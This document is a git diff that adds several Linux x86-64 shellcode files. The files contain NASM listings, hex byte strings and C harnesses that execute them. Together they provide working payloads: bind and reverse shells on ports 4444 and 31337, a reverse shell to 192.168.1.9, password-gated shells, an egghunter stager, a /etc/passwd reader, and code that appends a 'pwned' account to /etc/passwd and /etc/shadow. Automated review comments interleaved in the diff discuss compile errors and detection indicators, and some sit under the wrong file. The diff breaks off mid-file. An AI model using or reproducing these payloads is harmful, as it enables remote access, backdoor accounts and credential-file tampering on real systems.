description to rdi + xor rsi , rsi + + dup2: + push byte 0x21 + pop rax ; duplicate sockets dup2 (new, old) in this case (stdin , stdout , stderr); three times loop + syscall + inc rsi + cmp rsi , 0x3 ; go in the next couple of instruction if equals + + loopne dup2 + + xor rsi , rsi + mul rsi + xor rdi , rdi + sub spl , 0xff + mov rsi , rsp + mov dl , 0xff + syscall + + Inc_rsi: + cmp dil , 0xff + jz Exit + inc rsi + inc rdi + + + + cmp [rsi - 4] , dword 0x64616564 ; egghunter + jnz Inc_rsi + cmp [rsi - 8] , dword 0x64616564 + jnz Inc_rsi + jz _start_code + + Exit: + push byte 0x3c + pop rax + syscall + + + + +------------------------------------------------------------------------------------------------------------------------------------------------ + +Usage : + + Execve Shellcode + +#(echo -ne "\x68\x85\x11\x47\x02\x64\x65\x61\x64\x64\x65\x61\x64\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43" ; cat) | nc localhost 4444 + + +"x68\x85\x11\x47\x02" -->> dumm bytes + +"\x64\x65\x61\x64\x64\x65\x61\x64" -->> egg (deaddead) + +"\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10" +"\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff" -->> shellcode Execve JCP +"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42" +"\x42\x43\x43\x43\x43\x43\x43\x43\x43" + +--------------------------------------------------------------------------------------------------------------------------------------------------- + + +Shellcode : + +#include +#include + +unsigned char stager[] = \ 
+"\xeb\x02\xff\xd6\x48\x31\xd2\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\x31\xc0\x50\x48\xc7\xc3\xfd\xff\xee\xa3\x48\xf7\xd3\x53\x54\x6a\x31\x58\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x48\x31\xff\x40\x80\xec\xff\x48\x89\xe6\xb2\xff\x0f\x05\x40\x80\xff\xff\x74\x1e\x48\xff\xc6\x48\xff\xc7\x81\x7e\xfc\x64\x65\x61\x64\x75\xeb\x81\x7e\xf8\x64\x65\x61\x64\x75\xe2\x0f\x84\x6a\xff\xff\xff\x6a\x3c\x58\x0f\x05"; + +int main() + +{ + + printf("Stager Length: %d\n", (int)strlen(stager)); + + + (*(void (*)()) stager)(); + + + + + +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43563.c b/shellcodes/linux_x86-64/43563.c new file mode 100644 index 000000000..f4f4217bd --- /dev/null +++ b/shellcodes/linux_x86-64/43563.c 
@@ -0,0 +1,108 @@ +; shellcode name add_user_password_JCP_open,write,close +; Author : Christophe G SLAE64-1337 +; Len : 358 bytes +; Language : Nasm +; "name = pwned ; pass = $pass$" +; add user and password with open,write,close +; tested kali linux , kernel 3.12 + + +global _start + +_start: + + xor rax , rax + push rax + pop rsi + push rax ; null all register used for open syscall + pop rdx + add al , 0x2 + mov rdi , 0x647773ffffffffff + shr rdi , 0x28 + push rdi ; "/etc/passwd" + mov rdi , 0x7361702f6374652f + push rdi + mov rdi , rsp + mov si , 0x441 + mov dx , 0x284 + syscall ; open syscall + + xor edi , edi + add dil , 0x3 + +jmp short findaddress ; I placed the jmp short here size of code is too lenght for jmp short if placed in head + +_respawn: + + pop r9 + mov [r9 + 0x30] , byte 0xa ; terminate the string + lea rsi , [r9] ; "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash' + mov al , 0x1 + xor rdx , rdx + add rdx , 0x31 + syscall ; write syscall + + xor edi , edi + add dil , 0x3 + push rdi +pop rax + syscall ; close syscall + + xor rax , rax + push rax + pop rsi + add al , 0x2 + mov rdi , 0x776f64ffffffffff ; open '/etc/shadow' + shr rdi , 0x28 + push rdi + mov rdi , 0x6168732f6374652f + push rdi + mov rdi , rsp + mov si , 0x441 + mov dx , 0x284 + syscall ; open syscall + + + xor rax , rax + add al , 0x1 + xor edi , edi + add dil , 0x3 + lea rsi , [r9 + 0x31] ; "pwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::", 0xa + push rax + pop rdx + add dl , 0x83 + syscall ; write syscall + + xor edi , edi + add dil , 0x3 + push rdi + pop rax + syscall + + + + + xor rax , rax + add al , 0x3c ; exit (no matter value of exit code) + syscall + + + findaddress: + call _respawn + string : db "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bashApwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::",0xa + + + 
+#include
+#include
+
+unsigned char code[] = \
+"\x48\x31\xc0\x50\x5e\x50\x5a\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x73\x77\x64\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x70\x61\x73\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x31\xff\x40\x80\xc7\x03\xeb\x74\x41\x59\x41\xc6\x41\x30\x0a\x49\x8d\x31\xb0\x01\x48\x31\xd2\x48\x83\xc2\x31\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x50\x5e\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x73\x68\x61\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x48\x31\xc0\x04\x01\x31\xff\x40\x80\xc7\x03\x49\x8d\x71\x31\x50\x5a\x80\xc2\x83\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\x87\xff\xff\xff\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x70\x77\x6e\x65\x64\x3a\x24\x36\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x0a";
+
+
+
+int main()
+{
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+ (*(void (*)()) code)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43564.c b/shellcodes/linux_x86-64/43564.c
new file mode 100644
index 000000000..80f90f777
--- /dev/null
+++ b/shellcodes/linux_x86-64/43564.c
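Review bot: The NASM listing that opens this file is not wrapped in a comment, so `43563.c` is not a valid C translation unit — the assembler source and the C harness sit in the same file with nothing like the `/* … */` fence that 43568.asm and 43570.asm put around their listings. `43564.c` has the same layout and additionally has no `#include` at all, so `printf` and `strlen` are implicitly declared there. Either move the listing into a block comment (`/*` before `; shellcode name …` and `*/` before `#include`) or split it into a sibling `.asm` file; the `#include` directives here also arrive without a header name, which may be a rendering artifact but as shown will not preprocess. From a defensive reading, the string payload (a `pwned:x:1001:1002:…` passwd line and a matching shadow entry) is a concrete artifact that integrity monitoring of `/etc/passwd` and `/etc/shadow` would surface.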
@@ -0,0 +1,45 @@ +; shellcode name add_user_password +; Author : Christophe G SLAE64-1337 +; Len : 273 bytes +; Language : Nasm +; "name = pwned ; pass = $pass$" +; add user and password with echo cmd +; tested kali linux , kernel 3.12 + + + +global _start + +_start: + jmp short findaddress + +_realstart: + pop rdi + xor byte [rdi + 7] , 0x41 ; replace A to null byte "/bin/shA" + xor byte [rdi + 10] ,0x41 ; same "-cA" + xor rdx , rdx + lea rdi , [rdi] + lea r9 , [rdi + 8] + lea r10 , [rdi + 11] + push rdx + push r10 + push r9 + push rdi + mov rsi , rsp + add al , 59 + syscall + + +findaddress: + call _realstart + string : db "/bin/shA-cAecho pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash >> /etc/passwd ; echo pwned:\$6\$uiH7x.vhivD7LLXY\$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7::: >> /etc/shadow" + +unsigned char code[] = \ +"\xeb\x24\x5f\x80\x77\x07\x41\x80\x77\x0a\x41\x48\x31\xd2\x48\x8d\x3f\x4c\x8d\x4f\x08\x4c\x8d\x57\x0b\x52\x41\x52\x41\x51\x57\x48\x89\xe6\x04\x3b\x0f\x05\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x2d\x63\x41\x65\x63\x68\x6f\x20\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x65\x63\x68\x6f\x20\x70\x77\x6e\x65\x64\x3a\x5c\x24\x36\x5c\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x5c\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x73\x
68\x61\x64\x6f\x77" +; + +int main() +{ + printf("Shellcode Length: %d\n", (int)strlen(code)); + (*(void (*)()) code)(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43565.asm b/shellcodes/linux_x86-64/43565.asm new file mode 100644 index 000000000..6331cee76 --- /dev/null +++ b/shellcodes/linux_x86-64/43565.asm @@ -0,0 +1,51 @@ +BITS 64 +; Author Mr.Un1k0d3r - RingZer0 Team +; Read /etc/passwd Linux x86_64 Shellcode +; Shellcode size 82 bytes +global _start + +section .text + +_start: +jmp _push_filename + +_readfile: +; syscall open file +pop rdi ; pop path value +; NULL byte fix +xor byte [rdi + 11], 0x41 + +xor rax, rax +add al, 2 +xor rsi, rsi ; set O_RDONLY flag +syscall + +; syscall read file +sub sp, 0xfff +lea rsi, [rsp] +mov rdi, rax +xor rdx, rdx +mov dx, 0xfff; size to read +xor rax, rax +syscall + +; syscall write to stdout +xor rdi, rdi +add dil, 1 ; set stdout fd = 1 +mov rdx, rax +xor rax, rax +add al, 1 +syscall + +; syscall exit +xor rax, rax +add al, 60 +syscall + +_push_filename: +call _readfile +path: db "/etc/passwdA" + +Shellcode: + +\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41 \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43566.asm b/shellcodes/linux_x86-64/43566.asm new file mode 100644 index 000000000..1cbf3ce3c --- /dev/null +++ b/shellcodes/linux_x86-64/43566.asm 
@@ -0,0 +1,148 @@ +;Bind_TCP 4444 with password ; +;Default password = Password ; +;If connected the shellcode no prompt for password ; +;Enter password directly and you get the bin/sh shell; +;if password is wrong the shellcode exit: ; +;Christophe G SLAE64 - 1337 size 173 bytes ; + + + +global _start + + + +_start: + + +; sock = socket(AF_INET, SOCK_STREAM, 0) +; AF_INET = 2 +; SOCK_STREAM = 1 +; syscall number 41 + +push 0x29 +pop rax +push 0x2 +pop rdi +push 0x1 +pop rsi +xchg rbx , rdx +syscall + +; copy socket descriptor to rdi for future use +xchg rax , rdi + + +; server.sin_family = AF_INET +; server.sin_port = htons(PORT) +; server.sin_addr.s_addr = INADDR_ANY +; bzero(&server.sin_zero, 8) + +xor rax, rax + +mov dword [rsp - 4] , eax +mov word [rsp - 6] ,0x5c11 +mov byte [rsp - 8] , 0x2 +sub rsp , 8 + + +; bind(sock, (struct sockaddr *)&server, sockaddr_len) +; syscall number 49 +push 0x31 +pop rax +mov rsi, rsp +push 0x10 +pop rdx +syscall + + +; listen(sock, MAX_CLIENTS) +; syscall number 50 + +push 0x32 +pop rax +push 0x2 +pop rsi +syscall + + +; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) +; syscall number 43 + + +push 0x2b +pop rax +sub rsp, 0x10 +mov rsi, rsp +push 0x10 +mov rdx, rsp + +syscall + +; store the client socket description +mov r9, rax + +; close parent +push 0x3 +pop rax +syscall + + + + + +xchg rdi , r9 +xor rsi , rsi + +dup2: + push 0x21 + pop rax + syscall + inc rsi + cmp rsi , 0x2 + loopne dup2 + +CheckPass: + xor rax , rax + push 0x10 + pop rdx + sub rsp , 16 ; 16 bytes to receive user input + mov rsi , rsp + xor edi , edi + syscall ; system read function call + mov rax , 0x64726f7773736150 ; "Password" + lea rdi , [rel rsi] + scasq + jz Execve + push 0x3c + pop rax + syscall + + + + + +Execve: + xor rax , rax + mov rdx , rax + push rax + + mov rbx, 0x68732f2f6e69622f + push rbx + + ; store /bin//sh address in RDI + mov rdi, rsp + + ; Second NULL push + push rax + + + ; Push address of /bin//sh + push rdi + + ; set 
RSI
+ mov rsi, rsp
+
+ ; Call the Execve syscall
+ push 0x3b
+ pop rax
+ syscall
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43568.asm b/shellcodes/linux_x86-64/43568.asm
new file mode 100644
index 000000000..ef3096748
--- /dev/null
+++ b/shellcodes/linux_x86-64/43568.asm
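Review bot: The header does not say that the password check compares only the first quadword of the 16-byte buffer read from the client (`mov rax , 0x64726f7773736150` followed by a single `scasq`), so any input whose first eight bytes are `Password` passes regardless of what follows; a one-line comment at `CheckPass:` such as `; only the first 8 received bytes are compared` would make the contract explicit. The same cleartext-immediate pattern appears in 43568.asm and 43570.asm (`doomedra`). For defenders, that immediate is a fixed 8-byte ASCII constant embedded in the code, which makes it a convenient static indicator for this family.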
@@ -0,0 +1,107 @@ +/* +; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 1322 +; 138 bytes +global _start +section .text +_start: + + ;socket syscall + push byte 0x29 ; 41 socket + pop rax + push byte 0x2 ; AF_INET + pop rdi + push byte 0x1 ; SOCK_STREAM + pop rsi + cdq ;rdx = 0 - ANY + syscall + + xchg rdi, rax ; save socket descriptor + + mov dword [rsp-4], 0x0901a8c0 ; ip + mov word [rsp-6], 0x5c11 ; port 4444 + mov byte [rsp-8], 0x02 + sub rsp, 8 + + push byte 0x2a ; connect + pop rax + mov rsi, rsp ; pointer + push byte 0x10 ; len + pop rdx + syscall + + push byte 0x3; counter + pop rsi + +dup2_loop: + dec rsi + push byte 0x21 + pop rax + syscall + jnz dup2_loop ; jump if not 0 + + ;read buffer + mov rdi, rax ; socket + ;xor rax, rax + cdq + mov byte [rsp-1], al ;0 read + sub rsp, 1 + + push rdx + lea rsi, [rsp-0x10] ; 16 bytes from buf + add dl, 0x10 ; size_t count + syscall + + ;test passcode + mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex') + push rdi ; save the socket + lea rdi, [rsi] ; load string from address + scasq ; compare + jz accepted_passwd ; jump if equal + + ;exit if different :P + push byte 0x3c + pop rax + syscall + +accepted_passwd: + + ;execve + pop rdi; socket + xor rax, rax + mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse + push rbx + mov rdi, rsp + push rax + mov rdx, rsp + push rdi + mov rsi, rsp + add al, 0x3b + syscall +*/ + +#include +#include + +// 138 bytes +unsigned char code[] =\ +"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05" +"\x48\x97\xc7\x44\x24\xfc" +"\xc0\xa8\x01\x09\x66\xc7\x44\x24\xfa" +"\x11\x5c" //port big endiant +"\xc6\x44\x24\xf8\x02\x48\x83" +"\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f" +"\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05" +"\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83" +"\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f" +"\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57" +"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05" 
+"\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
+"\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
+"\x89\xe6\x04\x3b\x0f\x05";
+
+main()
+{
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43570.asm b/shellcodes/linux_x86-64/43570.asm
new file mode 100644
index 000000000..5b0b8cf5e
--- /dev/null
+++ b/shellcodes/linux_x86-64/43570.asm
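Review bot: `43568.asm` is a C translation unit — a `/* … */`-fenced NASM listing followed by `#include`, `unsigned char code[]` and a `main` — so the `.asm` extension is misleading and anything that assembles by extension will fail on it; 43570.asm has the same content shape. `main()` is declared without a return type, which is implicit-int and rejected since C99; `int main(void)` fixes it. The constants in the listing deserve their decoded values in the comments, since the C side does not repeat them: `mov dword [rsp-4], 0x0901a8c0 ; ip 192.168.1.9, network byte order` and `mov word [rsp-6], 0x5c11 ; port 4444, network byte order`.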
@@ -0,0 +1,134 @@ +/* +;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322 +;175 bytes +;http://www.doomedraven.com/2014/05/slaex64-shellbindtcp-with-passcode.html + +global _start +section .text +_start: + push byte 0x29 ; 41 - socket syscall + pop rax + push byte 0x02 ; AF_INET + pop rdi + push byte 0x01 ; SOCK_STREAM + pop rsi + cdq + syscall + + ;copy socket descriptor to rdi for future use + ;bind + xchg rdi, rax + xor rax, rax + mov dword [rsp-4], eax ;INADDR_ANY + mov word [rsp-6], 0x5c11 ;PORT 4444 + mov byte [rsp-8], 0x2 ;AF_INET + sub rsp, 0x8 + + push byte 0x31 ;49 bind + pop rax + mov rsi, rsp + cdq + add dl, 16 ;len + syscall + + ;listen + push byte 0x32 ;listen + pop rax + ;push byte 0x02 ;max clients + ;pop rsi + syscall + + push byte 0x2b ; accept + pop rax + sub rsp, 0x10 ; adjust + xor rsi, rsi + mov rsi, rsp ; pointer + mov byte [rsp-1], 0x10 ;len + sub rsp, 0x01 ; adjust + cdq + mov rdx, rsp ; pointer + syscall + + ;read buffer + mov rdi, rax ; socket + xor rax, rax + mov byte [rsp-1], al ;0 read + sub rsp, 1 + cdq + push rdx ; 0 stdin + lea rsi, [rsp-0x10] ; 16 bytes from buffer + add dl, 0x10 ; len + syscall + + ;test passcode + mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex') + push rdi ; save the socket + lea rdi, [rsi] ; load string from address + scasq ; compare + jz accepted_passwd ; jump if equal + + ;exit if different :P + xor rax, rax + add al, 60 + syscall + +accepted_passwd: + + pop rdi; socket + push byte 0x03 + pop rsi + +dup2_loop: + dec rsi + push byte 0x21 + pop rax + syscall + jnz dup2_loop ; jump if not 0 + + push rsi; 0 + + ;execve + ;push /bin//sh in reverse + mov rbx, 0x68732f2f6e69622f + push rbx + + mov rdi, rsp + push rsi + + mov rdx, rsp + push rdi + + mov rsi, rsp + push byte 0x3b + pop rax + syscall + +*/ + +#include +#include + +// 175 bytes +unsigned char code[] =\ +"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05" +"\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44" 
+"\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec"
+"\x08\x6a\x31\x58\x48\x89\xe6\x99\x80\xc2\x10\x0f"
+"\x05\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x48\x83\xec"
+"\x10\x48\x31\xf6\x48\x89\xe6\xc6\x44\x24\xff\x10"
+"\x48\x83\xec\x01\x99\x48\x89\xe2\x0f\x05\x48\x89"
+"\xc7\x48\x31\xc0\x88\x44\x24\xff\x48\x83\xec\x01"
+"\x99\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05"
+"\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48"
+"\x8d\x3e\x48\xaf\x74\x07\x48\x31\xc0\x04\x3c\x0f"
+"\x05\x5f\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f"
+"\x05\x75\xf6\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
+"\x73\x68\x53\x48\x89\xe7\x56\x48\x89\xe2\x57\x48"
+"\x89\xe6\x6a\x3b\x58\x0f\x05";
+
+main()
+{
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43597.c b/shellcodes/linux_x86-64/43597.c
new file mode 100644
index 000000000..0556f4cc2
--- /dev/null
+++ b/shellcodes/linux_x86-64/43597.c
@@ -0,0 +1,77 @@ +/* + + Shell Bind TCP Random Port Shellcode - C Language - Linux/x86_64 + Copyright (C) 2013 Geyslan G. Bem, Hacking bits + + http://hackingbits.com + geyslan@gmail.com + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see + +*/ + + +/* + + shell_bind_tcp_random_port_shellcode_x86_64 + assembly source: https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm + + * 57 bytes + * null-free + + + # gcc -m64 -fno-stack-protector -z execstack shell_bind_tcp_random_port_shellcode_x86_64.c -o shell_bind_tcp_random_port_shellcode_x86_64 + + Testing + # ./shell_bind_tcp_random_port_shellcode_x86_64 + # netstat -anp | grep shell + # nmap -sS 127.0.0.1 -p- (It's necessary to use the TCP SYN scan option [-sS]; thus avoids that nmap connects to the port open by shellcode) + # nc 127.0.0.1 port + +*/ + + +#include +#include + +unsigned char code[] = \ + +"\x48\x31\xf6\x48\xf7\xe6\xff\xc6\x6a\x02" +"\x5f\xb0\x29\x0f\x05\x52\x5e\x50\x5f\xb0" +"\x32\x0f\x05\xb0\x2b\x0f\x05\x57\x5e\x48" +"\x97\xff\xce\xb0\x21\x0f\x05\x75\xf8\x52" +"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" +"\x57\x54\x5f\xb0\x3b\x0f\x05"; + +main () +{ + + // When contains null bytes, printf will show a wrong shellcode length. + + printf("Shellcode Length: %d\n", strlen(code)); + + // Pollutes all registers ensuring that the shellcode runs in any circumstance. 
+
+ __asm__ ("mov $0xffffffffffffffff, %rax\n\t"
+ "mov %rax, %rbx\n\t"
+ "mov %rax, %rcx\n\t"
+ "mov %rax, %rdx\n\t"
+ "mov %rax, %rsi\n\t"
+ "mov %rax, %rdi\n\t"
+ "mov %rax, %rbp\n\t"
+
+ // Calling the shellcode
+ "call code");
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/43598.c b/shellcodes/linux_x86-64/43598.c
new file mode 100644
index 000000000..f8c55487d
--- /dev/null
+++ b/shellcodes/linux_x86-64/43598.c
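Review bot: `printf("Shellcode Length: %d\n", strlen(code));` passes a `size_t` to `%d`, which is undefined behavior and warns under `-Wformat`; the line should read `printf("Shellcode Length: %zu\n", strlen(code));` (the other harnesses in this commit cast to `int` instead). The `__asm__` statement overwrites rax, rbx, rcx, rdx, rsi, rdi and rbp without a clobber list, so the compiler is entitled to assume those registers still hold live values afterwards — harmless here only because `call code` never returns, which deserves a comment on the statement. `main ()` also lacks a return type; `int main(void)` matches the other files.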
@@ -0,0 +1,112 @@ +/* +Title : tcpbindshell (150 bytes) +Date : 04 October 2013 +Author : Russell Willis +Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux) + +$ objdump -D tcpbindshell -M intel +tcpbindshell: file format elf64-x86-64 +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 48 31 c0 xor rax,rax + 400083: 48 31 ff xor rdi,rdi + 400086: 48 31 f6 xor rsi,rsi + 400089: 48 31 d2 xor rdx,rdx + 40008c: 4d 31 c0 xor r8,r8 + 40008f: 6a 02 push 0x2 + 400091: 5f pop rdi + 400092: 6a 01 push 0x1 + 400094: 5e pop rsi + 400095: 6a 06 push 0x6 + 400097: 5a pop rdx + 400098: 6a 29 push 0x29 + 40009a: 58 pop rax + 40009b: 0f 05 syscall + 40009d: 49 89 c0 mov r8,rax + 4000a0: 4d 31 d2 xor r10,r10 + 4000a3: 41 52 push r10 + 4000a5: 41 52 push r10 + 4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2 + 4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a + 4000b2: 48 89 e6 mov rsi,rsp + 4000b5: 41 50 push r8 + 4000b7: 5f pop rdi + 4000b8: 6a 10 push 0x10 + 4000ba: 5a pop rdx + 4000bb: 6a 31 push 0x31 + 4000bd: 58 pop rax + 4000be: 0f 05 syscall + 4000c0: 41 50 push r8 + 4000c2: 5f pop rdi + 4000c3: 6a 01 push 0x1 + 4000c5: 5e pop rsi + 4000c6: 6a 32 push 0x32 + 4000c8: 58 pop rax + 4000c9: 0f 05 syscall + 4000cb: 48 89 e6 mov rsi,rsp + 4000ce: 48 31 c9 xor rcx,rcx + 4000d1: b1 10 mov cl,0x10 + 4000d3: 51 push rcx + 4000d4: 48 89 e2 mov rdx,rsp + 4000d7: 41 50 push r8 + 4000d9: 5f pop rdi + 4000da: 6a 2b push 0x2b + 4000dc: 58 pop rax + 4000dd: 0f 05 syscall + 4000df: 59 pop rcx + 4000e0: 4d 31 c9 xor r9,r9 + 4000e3: 49 89 c1 mov r9,rax + 4000e6: 4c 89 cf mov rdi,r9 + 4000e9: 48 31 f6 xor rsi,rsi + 4000ec: 6a 03 push 0x3 + 4000ee: 5e pop rsi +00000000004000ef : + 4000ef: 48 ff ce dec rsi + 4000f2: 6a 21 push 0x21 + 4000f4: 58 pop rax + 4000f5: 0f 05 syscall + 4000f7: 75 f6 jne 4000ef + 4000f9: 48 31 ff xor rdi,rdi + 4000fc: 57 push rdi + 4000fd: 57 push rdi + 4000fe: 5e pop rsi + 4000ff: 5a pop rdx + 400100: 48 bf 2f 2f 62 69 6e movabs 
rdi,0x68732f6e69622f2f
+ 400107: 2f 73 68
+ 40010a: 48 c1 ef 08 shr rdi,0x8
+ 40010e: 57 push rdi
+ 40010f: 54 push rsp
+ 400110: 5f pop rdi
+ 400111: 6a 3b push 0x3b
+ 400113: 58 pop rax
+ 400114: 0f 05 syscall
+
+ Code not is not optimal, this is left as an exercise to the reader ;^)
+
+*/
+
+#include
+
+#define PORT "\x7a\x69" /* 31337 */
+
+unsigned char code[] = \
